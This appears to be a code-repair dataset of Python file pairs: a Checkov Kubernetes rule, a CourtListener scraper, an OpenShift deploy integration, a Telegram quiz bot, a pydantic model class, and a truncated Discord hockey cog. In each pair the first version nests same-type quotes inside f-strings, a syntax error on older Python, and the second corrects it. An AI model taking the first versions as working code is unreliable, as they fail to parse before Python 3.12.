def flatten(src) -> Iterator:
"""flatten iterable of iterables"""
return chain.from_iterable(src)
def to_date_if_correct(date: str) -> Optional[datetime.datetime]:
try:
day, month, year = date.split('.')
date = datetime.datetime(int(year), int(month), int(day))
except ValueError:
return None
return date |
from checkov.common.models.enums import CheckCategories, CheckResult
from checkov.kubernetes.base_spec_check import BaseK8Check
class ApiServerBasicAuthFile(BaseK8Check):
def __init__(self):
id = "CKV_K8S_69"
name = "Ensure that the --basic-auth-file argument is not set"
categories = [CheckCategories.KUBERNETES]
supported_entities = ['containers']
super().__init__(name=name, id=id, categories=categories, supported_entities=supported_entities)
def get_resource_id(self, conf):
return f'{conf['parent']} - {conf['name']}' if conf.get('name') else conf["parent"]
def scan_spec_conf(self, conf):
if "command" in conf:
if "kube-apiserver" in conf["command"]:
if any(x.startswith('--basic-auth-file') for x in conf["command"]):
return CheckResult.FAILED
return CheckResult.PASSED
check = ApiServerBasicAuthFile()
| from checkov.common.models.enums import CheckCategories, CheckResult
from checkov.kubernetes.base_spec_check import BaseK8Check
class ApiServerBasicAuthFile(BaseK8Check):
def __init__(self):
id = "CKV_K8S_69"
name = "Ensure that the --basic-auth-file argument is not set"
categories = [CheckCategories.KUBERNETES]
supported_entities = ['containers']
super().__init__(name=name, id=id, categories=categories, supported_entities=supported_entities)
def get_resource_id(self, conf):
return f'{conf["parent"]} - {conf["name"]}' if conf.get('name') else conf["parent"]
def scan_spec_conf(self, conf):
if "command" in conf:
if "kube-apiserver" in conf["command"]:
if any(x.startswith('--basic-auth-file') for x in conf["command"]):
return CheckResult.FAILED
return CheckResult.PASSED
check = ApiServerBasicAuthFile()
|
import fields
from utils import *
from csv import DictWriter
from argparse import ArgumentParser
def main(max_row):
url = 'https://www.courtlistener.com/api/rest/v3/financial-disclosures'
count = 1
row_num = 1
with open('data/output.csv', 'w', newline = '', encoding = 'utf-8') as f:
writer = DictWriter(f, fields.all_field_names)
writer.writeheader()
while count:
data = req(url)
people = data.get('results')
#rate limited
while not people:
#wait 15 mins
print('sleeping...')
sleep_progress(60 * 15)
data = req(url)
people = data.get('results')
for person in people:
print(f'starting on {person['resource_uri']}')
#compute here and save so not recomputing unnecesarily
non_disc_fields = get_person_fields(person) | get_common_fields(person)
for disc_type in fields.disc_types:
print(f'\tGrabbing {disc_type}')
#each individual disclosure per type per person
for disc in person[disc_type]:
try:
row = get_disclosure_fields(disc, disc_type) | non_disc_fields | {'Disclosure Type': disc_type}
writer.writerow(row)
except:
...
print(f'row: {row_num}')
if row_num >= max_row:
print('\n\nFINISHED')
quit()
row_num += 1
url = data.get('next')
#reached end
if not url:
break
count += len(people)
print(f'On person {count}')
print('\n\nFINISHED')
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('-max', type = float, default = float('inf'))
args = parser.parse_args()
main(args.max) | import fields
from utils import *
from csv import DictWriter
from argparse import ArgumentParser
def main(max_row):
url = 'https://www.courtlistener.com/api/rest/v3/financial-disclosures'
count = 1
row_num = 1
with open('data/output.csv', 'w', newline = '', encoding = 'utf-8') as f:
writer = DictWriter(f, fields.all_field_names)
writer.writeheader()
while count:
data = req(url)
people = data.get('results')
#rate limited
while not people:
#wait 15 mins
print('sleeping...')
sleep_progress(60 * 15)
data = req(url)
people = data.get('results')
for person in people:
print(f'starting on {person["resource_uri"]}')
#compute here and save so not recomputing unnecesarily
non_disc_fields = get_person_fields(person) | get_common_fields(person)
for disc_type in fields.disc_types:
print(f'\tGrabbing {disc_type}')
#each individual disclosure per type per person
for disc in person[disc_type]:
try:
row = get_disclosure_fields(disc, disc_type) | non_disc_fields | {'Disclosure Type': disc_type}
writer.writerow(row)
except:
...
print(f'row: {row_num}')
if row_num >= max_row:
print('\n\nFINISHED')
quit()
row_num += 1
url = data.get('next')
#reached end
if not url:
break
count += len(people)
print(f'On person {count}')
print('\n\nFINISHED')
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('-max', type = float, default = float('inf'))
args = parser.parse_args()
main(args.max) |
import sys
import semver
import logging
import reconcile.queries as queries
import reconcile.openshift_base as ob
import reconcile.jenkins_plugins as jenkins_base
from reconcile.slack_base import init_slack
from utils.gitlab_api import GitLabApi
from utils.saasherder import SaasHerder
from utils.defer import defer
QONTRACT_INTEGRATION = 'openshift-saas-deploy'
QONTRACT_INTEGRATION_VERSION = semver.format_version(0, 1, 0)
@defer
def run(dry_run, thread_pool_size=10, io_dir='throughput/',
saas_file_name=None, env_name=None, defer=None):
saas_files = queries.get_saas_files(saas_file_name, env_name)
if not saas_files:
logging.error('no saas files found')
sys.exit(1)
instance = queries.get_gitlab_instance()
desired_jenkins_instances = [s['instance']['name'] for s in saas_files]
jenkins_map = jenkins_base.get_jenkins_map(
desired_instances=desired_jenkins_instances)
settings = queries.get_app_interface_settings()
try:
gl = GitLabApi(instance, settings=settings)
except Exception:
# allow execution without access to gitlab
# as long as there are no access attempts.
gl = None
saasherder = SaasHerder(
saas_files,
thread_pool_size=thread_pool_size,
gitlab=gl,
integration=QONTRACT_INTEGRATION,
integration_version=QONTRACT_INTEGRATION_VERSION,
settings=settings,
jenkins_map=jenkins_map)
if len(saasherder.namespaces) == 0:
logging.warning('no targets found')
sys.exit(0)
ri, oc_map = ob.fetch_current_state(
namespaces=saasherder.namespaces,
thread_pool_size=thread_pool_size,
integration=QONTRACT_INTEGRATION,
integration_version=QONTRACT_INTEGRATION_VERSION,
init_api_resources=True)
defer(lambda: oc_map.cleanup())
saasherder.populate_desired_state(ri)
# if saas_file_name is defined, the integration
# is being called from multiple running instances
actions = ob.realize_data(
dry_run, oc_map, ri,
caller=saas_file_name,
wait_for_namespace=True,
no_dry_run_skip_compare=(not saasherder.compare),
take_over=saasherder.take_over
)
if not dry_run:
if saasherder.publish_job_logs:
try:
ob.follow_logs(oc_map, actions, io_dir)
except Exception as e:
logging.error(str(e))
ri.register_error()
try:
ob.validate_data(oc_map, actions)
except Exception as e:
logging.error(str(e))
ri.register_error()
if ri.has_error_registered():
sys.exit(1)
# send human readable notifications to slack
# we only do this if:
# - this is not a dry run
# - there is a single saas file deployed
# - output is 'events'
# - no errors were registered
if not dry_run and len(saasherder.saas_files) == 1:
saas_file = saasherder.saas_files[0]
slack_info = saas_file.get('slack')
if slack_info and actions and slack_info.get('output') == 'events':
slack = init_slack(slack_info, QONTRACT_INTEGRATION,
init_usergroups=False)
for action in actions:
message = \
f"[{action["cluster"]}] " + \
f"{action["kind"]} {action["name"]} {action["action"]}"
slack.chat_post_message(message)
| import sys
import semver
import logging
import reconcile.queries as queries
import reconcile.openshift_base as ob
import reconcile.jenkins_plugins as jenkins_base
from reconcile.slack_base import init_slack
from utils.gitlab_api import GitLabApi
from utils.saasherder import SaasHerder
from utils.defer import defer
QONTRACT_INTEGRATION = 'openshift-saas-deploy'
QONTRACT_INTEGRATION_VERSION = semver.format_version(0, 1, 0)
@defer
def run(dry_run, thread_pool_size=10, io_dir='throughput/',
saas_file_name=None, env_name=None, defer=None):
saas_files = queries.get_saas_files(saas_file_name, env_name)
if not saas_files:
logging.error('no saas files found')
sys.exit(1)
instance = queries.get_gitlab_instance()
desired_jenkins_instances = [s['instance']['name'] for s in saas_files]
jenkins_map = jenkins_base.get_jenkins_map(
desired_instances=desired_jenkins_instances)
settings = queries.get_app_interface_settings()
try:
gl = GitLabApi(instance, settings=settings)
except Exception:
# allow execution without access to gitlab
# as long as there are no access attempts.
gl = None
saasherder = SaasHerder(
saas_files,
thread_pool_size=thread_pool_size,
gitlab=gl,
integration=QONTRACT_INTEGRATION,
integration_version=QONTRACT_INTEGRATION_VERSION,
settings=settings,
jenkins_map=jenkins_map)
if len(saasherder.namespaces) == 0:
logging.warning('no targets found')
sys.exit(0)
ri, oc_map = ob.fetch_current_state(
namespaces=saasherder.namespaces,
thread_pool_size=thread_pool_size,
integration=QONTRACT_INTEGRATION,
integration_version=QONTRACT_INTEGRATION_VERSION,
init_api_resources=True)
defer(lambda: oc_map.cleanup())
saasherder.populate_desired_state(ri)
# if saas_file_name is defined, the integration
# is being called from multiple running instances
actions = ob.realize_data(
dry_run, oc_map, ri,
caller=saas_file_name,
wait_for_namespace=True,
no_dry_run_skip_compare=(not saasherder.compare),
take_over=saasherder.take_over
)
if not dry_run:
if saasherder.publish_job_logs:
try:
ob.follow_logs(oc_map, actions, io_dir)
except Exception as e:
logging.error(str(e))
ri.register_error()
try:
ob.validate_data(oc_map, actions)
except Exception as e:
logging.error(str(e))
ri.register_error()
if ri.has_error_registered():
sys.exit(1)
# send human readable notifications to slack
# we only do this if:
# - this is not a dry run
# - there is a single saas file deployed
# - output is 'events'
# - no errors were registered
if not dry_run and len(saasherder.saas_files) == 1:
saas_file = saasherder.saas_files[0]
slack_info = saas_file.get('slack')
if slack_info and actions and slack_info.get('output') == 'events':
slack = init_slack(slack_info, QONTRACT_INTEGRATION,
init_usergroups=False)
for action in actions:
message = \
f"[{action['cluster']}] " + \
f"{action['kind']} {action['name']} {action['action']}"
slack.chat_post_message(message)
|
import logging
import os
import random
import redis
import telegram
from dotenv import load_dotenv
from functools import partial
from bot_utils import get_arguments
from bot_utils import get_quiz_qa
from enum import Enum
from telegram.ext import ConversationHandler
from telegram.ext import CommandHandler
from telegram.ext import Filters
from telegram.ext import MessageHandler
from telegram.ext import Updater
QUIZ = Enum('Quiz', 'Question Answer')
def start(update, _):
custom_keyboard = [['Новый вопрос', 'Сдаться'], ['Мой счёт']]
reply_markup = telegram.ReplyKeyboardMarkup(custom_keyboard)
update.message.reply_text(
'Привет. Готов к викторине? Начнем!',
reply_markup=reply_markup
)
return QUIZ.Question
def cancel(update, _):
update.message.reply_text(
'Пока-пока!',
reply_markup=telegram.ReplyKeyboardRemove()
)
return ConversationHandler.END
def handle_new_question_request(update, _, quiz_qa, redis_connection):
question = random.choice([*quiz_qa])
redis_connection.set(f"tg-{update.message.from_user["id"]}", question)
update.message.reply_text(f'Вопрос: {question}')
return QUIZ.Answer
def handle_solution_attempt(update, _, quiz_qa, redis_connection):
quiz_question = redis_connection.get(
f"tg-{update.message.from_user["id"]}"
).decode('utf-8')
message = 'Неправильно… Попробуешь ещё раз?'
if update.message.text.lower() in quiz_qa[quiz_question].lower():
update.message.reply_text(
'''Правильно! Поздравляю!
Для следующего вопроса нажми «Новый вопрос»''')
return QUIZ.Question
update.message.reply_text(message)
def handle_give_up(update, context, quiz_qa, redis_connection):
quiz_question = redis_connection.get(
f"tg-{update.message.from_user["id"]}"
).decode('utf-8')
answer = f'Ответ: {quiz_qa[quiz_question]}'
update.message.reply_text(answer)
handle_new_question_request(update, context, quiz_qa, redis_connection)
if __name__ == '__main__':
arguments = get_arguments()
level = logging.DEBUG if arguments.debug else logging.INFO
logging.basicConfig(level=level)
load_dotenv()
telegram_token = os.environ['TELEGRAM-TOKEN']
redis_host = os.environ['REDIS-BASE']
redis_port = os.environ['REDIS-PORT']
redis_password = os.environ['REDIS-PASSWORD']
logging.debug('Open Redis connection')
redis_connection = redis.Redis(
host=redis_host,
port=redis_port,
password=redis_password
)
logging.debug(
'Read questions and answers from files & make QA dictionary'
)
quiz_qa = get_quiz_qa('questions')
logging.debug('Prepare telegram bot')
updater = Updater(token=telegram_token)
dispatcher = updater.dispatcher
partial_handle_new_question_request = partial(
handle_new_question_request,
quiz_qa=quiz_qa,
redis_connection=redis_connection,
)
partial_handle_solution_attempt = partial(
handle_solution_attempt,
quiz_qa=quiz_qa,
redis_connection=redis_connection,
)
partial_handle_give_up = partial(
handle_give_up,
quiz_qa=quiz_qa,
redis_connection=redis_connection,
)
conversation_handler = ConversationHandler(
entry_points=[CommandHandler('start', start)],
states={
QUIZ.Question: [
MessageHandler(
Filters.regex('^(Новый вопрос)$'),
partial_handle_new_question_request
)
],
QUIZ.Answer: [
MessageHandler(
Filters.regex('^(Сдаться)$'),
partial_handle_give_up
),
MessageHandler(
Filters.text & ~Filters.command,
partial_handle_solution_attempt
),
]
},
fallbacks=[CommandHandler('cancel', cancel)]
)
dispatcher.add_handler(conversation_handler)
logging.debug('Run telegram bot')
updater.start_polling()
updater.idle()
| import logging
import os
import random
import redis
import telegram
from dotenv import load_dotenv
from functools import partial
from bot_utils import get_arguments
from bot_utils import get_quiz_qa
from enum import Enum
from telegram.ext import ConversationHandler
from telegram.ext import CommandHandler
from telegram.ext import Filters
from telegram.ext import MessageHandler
from telegram.ext import Updater
QUIZ = Enum('Quiz', 'Question Answer')
def start(update, _):
custom_keyboard = [['Новый вопрос', 'Сдаться'], ['Мой счёт']]
reply_markup = telegram.ReplyKeyboardMarkup(custom_keyboard)
update.message.reply_text(
'Привет. Готов к викторине? Начнем!',
reply_markup=reply_markup
)
return QUIZ.Question
def cancel(update, _):
update.message.reply_text(
'Пока-пока!',
reply_markup=telegram.ReplyKeyboardRemove()
)
return ConversationHandler.END
def handle_new_question_request(update, _, quiz_qa, redis_connection):
question = random.choice([*quiz_qa])
redis_connection.set(f"tg-{update.message.from_user['id']}", question)
update.message.reply_text(f'Вопрос: {question}')
return QUIZ.Answer
def handle_solution_attempt(update, _, quiz_qa, redis_connection):
quiz_question = redis_connection.get(
f"tg-{update.message.from_user['id']}"
).decode('utf-8')
message = 'Неправильно… Попробуешь ещё раз?'
if update.message.text.lower() in quiz_qa[quiz_question].lower():
update.message.reply_text(
'''Правильно! Поздравляю!
Для следующего вопроса нажми «Новый вопрос»''')
return QUIZ.Question
update.message.reply_text(message)
def handle_give_up(update, context, quiz_qa, redis_connection):
quiz_question = redis_connection.get(
f"tg-{update.message.from_user['id']}"
).decode('utf-8')
answer = f'Ответ: {quiz_qa[quiz_question]}'
update.message.reply_text(answer)
handle_new_question_request(update, context, quiz_qa, redis_connection)
if __name__ == '__main__':
arguments = get_arguments()
level = logging.DEBUG if arguments.debug else logging.INFO
logging.basicConfig(level=level)
load_dotenv()
telegram_token = os.environ['TELEGRAM-TOKEN']
redis_host = os.environ['REDIS-BASE']
redis_port = os.environ['REDIS-PORT']
redis_password = os.environ['REDIS-PASSWORD']
logging.debug('Open Redis connection')
redis_connection = redis.Redis(
host=redis_host,
port=redis_port,
password=redis_password
)
logging.debug(
'Read questions and answers from files & make QA dictionary'
)
quiz_qa = get_quiz_qa('questions')
logging.debug('Prepare telegram bot')
updater = Updater(token=telegram_token)
dispatcher = updater.dispatcher
partial_handle_new_question_request = partial(
handle_new_question_request,
quiz_qa=quiz_qa,
redis_connection=redis_connection,
)
partial_handle_solution_attempt = partial(
handle_solution_attempt,
quiz_qa=quiz_qa,
redis_connection=redis_connection,
)
partial_handle_give_up = partial(
handle_give_up,
quiz_qa=quiz_qa,
redis_connection=redis_connection,
)
conversation_handler = ConversationHandler(
entry_points=[CommandHandler('start', start)],
states={
QUIZ.Question: [
MessageHandler(
Filters.regex('^(Новый вопрос)$'),
partial_handle_new_question_request
)
],
QUIZ.Answer: [
MessageHandler(
Filters.regex('^(Сдаться)$'),
partial_handle_give_up
),
MessageHandler(
Filters.text & ~Filters.command,
partial_handle_solution_attempt
),
]
},
fallbacks=[CommandHandler('cancel', cancel)]
)
dispatcher.add_handler(conversation_handler)
logging.debug('Run telegram bot')
updater.start_polling()
updater.idle()
|
import json
from pathlib import Path
from typing import Any, Dict, Optional, Set, Union
import numpy
from pydantic import BaseModel, BaseSettings
from ..testing import compare_recursive
from ..util import deserialize, serialize, yaml_import
from ..util.autodocs import AutoPydanticDocGenerator
from ..util.decorators import classproperty
cmsschema_draft = "http://json-schema.org/draft-07/schema#"
__all__ = ["ProtoModel", "AutodocBaseSettings"]
class ProtoModel(BaseModel):
class Config:
allow_mutation: bool = False
extra: str = "forbid"
json_encoders: Dict[str, Any] = {numpy.ndarray: lambda v: v.flatten().tolist()}
serialize_default_excludes: Set = set()
serialize_skip_defaults: bool = False
force_skip_defaults: bool = False
def schema_extra(schema, model):
# below addresses the draft issue until https://github.com/samuelcolvin/pydantic/issues/1478 .
schema["$schema"] = cmsschema_draft
def __init_subclass__(cls, **kwargs) -> None:
super().__init_subclass__(**kwargs)
cls.__doc__ = AutoPydanticDocGenerator(cls, always_apply=True)
def __repr__(self):
return f'{self.__repr_name__()}({self.__repr_str__(', ')})'
def __str__(self):
return f'{self.__repr_name__()}({self.__repr_str__(', ')})'
@classproperty
def default_schema_name(cls) -> Union[str, None]:
"""Returns default schema name if found."""
try:
return cls.schema()["properties"]["schema_name"]["default"]
except Exception:
return None
@classmethod
def parse_raw(cls, data: Union[bytes, str], *, encoding: str = None) -> "ProtoModel": # type: ignore
"""
Parses raw string or bytes into a Model object.
Parameters
----------
data : Union[bytes, str]
A serialized data blob to be deserialized into a Model.
encoding : str, optional
The type of the serialized array, available types are: {'json', 'json-ext', 'msgpack-ext', 'pickle'}
Returns
-------
Model
The requested model from a serialized format.
"""
if encoding is None:
if isinstance(data, str):
encoding = "json" # Choose JSON over YAML by default
elif isinstance(data, bytes):
encoding = "msgpack-ext"
else:
raise TypeError(
"Input is neither str nor bytes, please specify an encoding."
)
if encoding.endswith(("json", "javascript", "pickle")):
return super().parse_raw(data, content_type=encoding)
elif encoding in ["msgpack-ext", "json-ext", "yaml"]:
obj = deserialize(data, encoding)
else:
raise TypeError(f"Content type '{encoding}' not understood.")
return cls.parse_obj(obj)
@classmethod
def parse_file(cls, path: Union[str, Path], *, encoding: str = None) -> "ProtoModel": # type: ignore
"""Parses a file into a Model object.
Parameters
----------
path : Union[str, Path]
The path to the file.
encoding : str, optional
The type of the files, available types are: {'json', 'msgpack', 'pickle', 'hdf5'}. Attempts to
automatically infer the file type from the file extension if None.
Returns
-------
Model
The requested model from a file format.
"""
path = Path(path)
if encoding is None:
if path.suffix in [".json", ".js"]:
encoding = "json"
elif path.suffix in [".yaml", ".yml"]:
encoding = "yaml"
elif path.suffix in [".msgpack"]:
encoding = "msgpack-ext"
elif path.suffix in [".pickle"]:
encoding = "pickle"
elif path.suffix in [".yaml", ".yml"]:
encoding = "yaml"
elif path.suffix in [".hdf5", ".h5"]:
encoding = "hdf5"
else:
raise TypeError(
"Could not infer `encoding`, please provide a `encoding` for this file."
)
if encoding == "yaml":
return cls.parse_raw(path.read_text(), encoding=encoding)
elif encoding in ("hdf5", "h5"):
from ..util import hdf
return cls.parse_obj(hdf.read_file(path))
return cls.parse_raw(path.read_bytes(), encoding=encoding)
def write_file(
self,
path: Union[str, Path],
*,
encoding: str = None,
mode: str = "w",
**kwargs: Optional[Dict[str, Any]],
):
"""Write a Model to an output file.
Parameters
----------
path : Union[str, Path]
The path to the file.
encoding : str, optional
The type of the files, available types are: {'json', 'msgpack', 'pickle', 'hdf5'}. Attempts to
automatically infer the file type from the file extension if None.
mode : str, optional
An optional string that specifies the mode in which the file is written. Overwrites existing
file by default (mode='w'). For appending to existing file, set mode='a'.
**kwargs: Dict[str, Any], optional
Additional keyword arguments passed to self.dict(), allows which fields to include, exclude, etc.
"""
encoding = encoding or Path(path).suffix[1:]
if encoding in ["json", "js", "yaml", "yml"]:
stringified = self.serialize(encoding=encoding, **kwargs)
with open(path, mode) as fp:
fp.write(stringified)
elif encoding in ["hdf5", "h5"]:
from ..util import hdf
hdf.write_file(path, data=self.dict(**kwargs), mode=mode)
def dict(
self, *, ser_kwargs: Dict[str, Any] = {}, **kwargs: Dict[str, Any]
) -> Dict[str, Any]:
"""Returns object fields as a dictionary.
Parameters
----------
ser_kwargs: Optional[Dict[str, Any]]
Additional keyword arguments to pass to serialize.
**kwargs: Optional[Dict[str, Any]]
Additional keyword arguments, allow which fields to include, exclude, etc.
Returns
-------
Dict[str, Any]
Fields as a dictionary.
"""
encoding = kwargs.pop("encoding", None)
kwargs["exclude"] = (
kwargs.get("exclude", None) or set()
) | self.__config__.serialize_default_excludes # type: ignore
kwargs.setdefault("exclude_unset", self.__config__.serialize_skip_defaults) # type: ignore
if self.__config__.force_skip_defaults: # type: ignore
kwargs["exclude_unset"] = True
data = super().dict(**kwargs)
if encoding is None:
return data
elif encoding == "json":
return json.loads(serialize(data, encoding=encoding, **ser_kwargs))
elif encoding == "yaml":
yaml = yaml_import(raise_error=True)
return yaml.safe_load(serialize(data, encoding=encoding, **ser_kwargs))
else:
raise KeyError(
f"Unknown encoding type '{encoding}', valid encoding types: 'json', 'yaml'."
)
def serialize(
self,
encoding: str,
*,
include: Optional[Set[str]] = None,
exclude: Optional[Set[str]] = None,
exclude_unset: Optional[bool] = None,
exclude_defaults: Optional[bool] = None,
exclude_none: Optional[bool] = None,
**kwargs: Optional[Dict[str, Any]],
) -> Union[bytes, str]:
"""Generates a serialized representation of the model
Parameters
----------
encoding : str
The serialization type, available types are: {'json', 'json-ext', 'msgpack-ext'}
include : Optional[Set[str]], optional
Fields to be included in the serialization.
exclude : Optional[Set[str]], optional
Fields to be excluded in the serialization.
exclude_unset : Optional[bool], optional
If True, skips fields that have default values provided.
exclude_defaults: Optional[bool], optional
If True, skips fields that have set or defaulted values equal to the default.
exclude_none: Optional[bool], optional
If True, skips fields that have value ``None``.
**kwargs: Optional[Dict[str, Any]]
Additional keyword arguments to pass to serialize.
Returns
-------
Union[bytes, str]
The serialized model.
"""
fdargs = {}
if include:
fdargs["include"] = include
if exclude:
fdargs["exclude"] = exclude
if exclude_unset:
fdargs["exclude_unset"] = exclude_unset
if exclude_defaults:
fdargs["exclude_defaults"] = exclude_defaults
if exclude_none:
fdargs["exclude_none"] = exclude_none
data = self.dict(**fdargs)
if encoding == "js":
encoding = "json"
elif encoding == "yml":
encoding = "yaml"
return serialize(data, encoding=encoding, **kwargs)
def json(self, **kwargs):
# Alias JSON here from BaseModel to reflect dict changes
return self.serialize("json", **kwargs)
def yaml(self, **kwargs):
return self.serialize("yaml", **kwargs)
def compare(self, other: Union["ProtoModel", BaseModel], **kwargs) -> bool:
"""Compares the current object to the provided object recursively.
Parameters
----------
other : Model
The model to compare to.
**kwargs
Additional kwargs to pass.
Returns
-------
bool
True if the objects match.
"""
return compare_recursive(self, other, **kwargs)
class AutodocBaseSettings(BaseSettings):
def __init_subclass__(cls) -> None:
cls.__doc__ = AutoPydanticDocGenerator(cls, always_apply=True)
| import json
from pathlib import Path
from typing import Any, Dict, Optional, Set, Union
import numpy
from pydantic import BaseModel, BaseSettings
from ..testing import compare_recursive
from ..util import deserialize, serialize, yaml_import
from ..util.autodocs import AutoPydanticDocGenerator
from ..util.decorators import classproperty
cmsschema_draft = "http://json-schema.org/draft-07/schema#"
__all__ = ["ProtoModel", "AutodocBaseSettings"]
class ProtoModel(BaseModel):
class Config:
allow_mutation: bool = False
extra: str = "forbid"
json_encoders: Dict[str, Any] = {numpy.ndarray: lambda v: v.flatten().tolist()}
serialize_default_excludes: Set = set()
serialize_skip_defaults: bool = False
force_skip_defaults: bool = False
def schema_extra(schema, model):
# below addresses the draft issue until https://github.com/samuelcolvin/pydantic/issues/1478 .
schema["$schema"] = cmsschema_draft
def __init_subclass__(cls, **kwargs) -> None:
super().__init_subclass__(**kwargs)
cls.__doc__ = AutoPydanticDocGenerator(cls, always_apply=True)
def __repr__(self):
return f'{self.__repr_name__()}({self.__repr_str__(", ")})'
def __str__(self):
return f'{self.__repr_name__()}({self.__repr_str__(", ")})'
@classproperty
def default_schema_name(cls) -> Union[str, None]:
"""Returns default schema name if found."""
try:
return cls.schema()["properties"]["schema_name"]["default"]
except Exception:
return None
@classmethod
def parse_raw(cls, data: Union[bytes, str], *, encoding: str = None) -> "ProtoModel": # type: ignore
"""
Parses raw string or bytes into a Model object.
Parameters
----------
data : Union[bytes, str]
A serialized data blob to be deserialized into a Model.
encoding : str, optional
The type of the serialized array, available types are: {'json', 'json-ext', 'msgpack-ext', 'pickle'}
Returns
-------
Model
The requested model from a serialized format.
"""
if encoding is None:
if isinstance(data, str):
encoding = "json" # Choose JSON over YAML by default
elif isinstance(data, bytes):
encoding = "msgpack-ext"
else:
raise TypeError(
"Input is neither str nor bytes, please specify an encoding."
)
if encoding.endswith(("json", "javascript", "pickle")):
return super().parse_raw(data, content_type=encoding)
elif encoding in ["msgpack-ext", "json-ext", "yaml"]:
obj = deserialize(data, encoding)
else:
raise TypeError(f"Content type '{encoding}' not understood.")
return cls.parse_obj(obj)
@classmethod
def parse_file(cls, path: Union[str, Path], *, encoding: str = None) -> "ProtoModel": # type: ignore
"""Parses a file into a Model object.
Parameters
----------
path : Union[str, Path]
The path to the file.
encoding : str, optional
The type of the files, available types are: {'json', 'msgpack', 'pickle', 'hdf5'}. Attempts to
automatically infer the file type from the file extension if None.
Returns
-------
Model
The requested model from a file format.
"""
path = Path(path)
if encoding is None:
if path.suffix in [".json", ".js"]:
encoding = "json"
elif path.suffix in [".yaml", ".yml"]:
encoding = "yaml"
elif path.suffix in [".msgpack"]:
encoding = "msgpack-ext"
elif path.suffix in [".pickle"]:
encoding = "pickle"
elif path.suffix in [".yaml", ".yml"]:
encoding = "yaml"
elif path.suffix in [".hdf5", ".h5"]:
encoding = "hdf5"
else:
raise TypeError(
"Could not infer `encoding`, please provide a `encoding` for this file."
)
if encoding == "yaml":
return cls.parse_raw(path.read_text(), encoding=encoding)
elif encoding in ("hdf5", "h5"):
from ..util import hdf
return cls.parse_obj(hdf.read_file(path))
return cls.parse_raw(path.read_bytes(), encoding=encoding)
def write_file(
self,
path: Union[str, Path],
*,
encoding: str = None,
mode: str = "w",
**kwargs: Optional[Dict[str, Any]],
):
"""Write a Model to an output file.
Parameters
----------
path : Union[str, Path]
The path to the file.
encoding : str, optional
The type of the files, available types are: {'json', 'msgpack', 'pickle', 'hdf5'}. Attempts to
automatically infer the file type from the file extension if None.
mode : str, optional
An optional string that specifies the mode in which the file is written. Overwrites existing
file by default (mode='w'). For appending to existing file, set mode='a'.
**kwargs: Dict[str, Any], optional
Additional keyword arguments passed to self.dict(), allows which fields to include, exclude, etc.
"""
encoding = encoding or Path(path).suffix[1:]
if encoding in ["json", "js", "yaml", "yml"]:
stringified = self.serialize(encoding=encoding, **kwargs)
with open(path, mode) as fp:
fp.write(stringified)
elif encoding in ["hdf5", "h5"]:
from ..util import hdf
hdf.write_file(path, data=self.dict(**kwargs), mode=mode)
def dict(
self, *, ser_kwargs: Dict[str, Any] = {}, **kwargs: Dict[str, Any]
) -> Dict[str, Any]:
"""Returns object fields as a dictionary.
Parameters
----------
ser_kwargs: Optional[Dict[str, Any]]
Additional keyword arguments to pass to serialize.
**kwargs: Optional[Dict[str, Any]]
Additional keyword arguments, allow which fields to include, exclude, etc.
Returns
-------
Dict[str, Any]
Fields as a dictionary.
"""
encoding = kwargs.pop("encoding", None)
kwargs["exclude"] = (
kwargs.get("exclude", None) or set()
) | self.__config__.serialize_default_excludes # type: ignore
kwargs.setdefault("exclude_unset", self.__config__.serialize_skip_defaults) # type: ignore
if self.__config__.force_skip_defaults: # type: ignore
kwargs["exclude_unset"] = True
data = super().dict(**kwargs)
if encoding is None:
return data
elif encoding == "json":
return json.loads(serialize(data, encoding=encoding, **ser_kwargs))
elif encoding == "yaml":
yaml = yaml_import(raise_error=True)
return yaml.safe_load(serialize(data, encoding=encoding, **ser_kwargs))
else:
raise KeyError(
f"Unknown encoding type '{encoding}', valid encoding types: 'json', 'yaml'."
)
def serialize(
self,
encoding: str,
*,
include: Optional[Set[str]] = None,
exclude: Optional[Set[str]] = None,
exclude_unset: Optional[bool] = None,
exclude_defaults: Optional[bool] = None,
exclude_none: Optional[bool] = None,
**kwargs: Optional[Dict[str, Any]],
) -> Union[bytes, str]:
"""Generates a serialized representation of the model
Parameters
----------
encoding : str
The serialization type, available types are: {'json', 'json-ext', 'msgpack-ext'}
include : Optional[Set[str]], optional
Fields to be included in the serialization.
exclude : Optional[Set[str]], optional
Fields to be excluded in the serialization.
exclude_unset : Optional[bool], optional
If True, skips fields that have default values provided.
exclude_defaults: Optional[bool], optional
If True, skips fields that have set or defaulted values equal to the default.
exclude_none: Optional[bool], optional
If True, skips fields that have value ``None``.
**kwargs: Optional[Dict[str, Any]]
Additional keyword arguments to pass to serialize.
Returns
-------
Union[bytes, str]
The serialized model.
"""
fdargs = {}
if include:
fdargs["include"] = include
if exclude:
fdargs["exclude"] = exclude
if exclude_unset:
fdargs["exclude_unset"] = exclude_unset
if exclude_defaults:
fdargs["exclude_defaults"] = exclude_defaults
if exclude_none:
fdargs["exclude_none"] = exclude_none
data = self.dict(**fdargs)
if encoding == "js":
encoding = "json"
elif encoding == "yml":
encoding = "yaml"
return serialize(data, encoding=encoding, **kwargs)
def json(self, **kwargs):
# Alias JSON here from BaseModel to reflect dict changes
return self.serialize("json", **kwargs)
def yaml(self, **kwargs):
return self.serialize("yaml", **kwargs)
def compare(self, other: Union["ProtoModel", BaseModel], **kwargs) -> bool:
"""Compares the current object to the provided object recursively.
Parameters
----------
other : Model
The model to compare to.
**kwargs
Additional kwargs to pass.
Returns
-------
bool
True if the objects match.
"""
return compare_recursive(self, other, **kwargs)
class AutodocBaseSettings(BaseSettings):
def __init_subclass__(cls) -> None:
cls.__doc__ = AutoPydanticDocGenerator(cls, always_apply=True)
|
import discord
import aiohttp
import asyncio
import json
import yaml
import logging
from datetime import datetime, timedelta
from io import BytesIO
from urllib.parse import quote
from redbot.core import commands, checks, Config
from redbot.core.data_manager import cog_data_path
from redbot.core.i18n import Translator, cog_i18n
from .teamentry import TeamEntry
from .menu import hockey_menu
from .embeds import *
from .helper import *
from .errors import *
from .game import Game
from .pickems import Pickems
from .standings import Standings
from .gamedaychannels import GameDayChannels
from .constants import *
try:
from .oilers import Oilers
LIGHTS_SET = True
except:
LIGHTS_SET = False
pass
_ = Translator("Hockey", __file__)
log = logging.getLogger("red.Hockey")
__version__ = "2.3.2"
__author__ = "TrustyJAID"
@cog_i18n(_)
class Hockey(getattr(commands, "Cog", object)):
"""
Gather information and post goal updates for NHL hockey teams
"""
def __init__(self, bot):
self.bot = bot
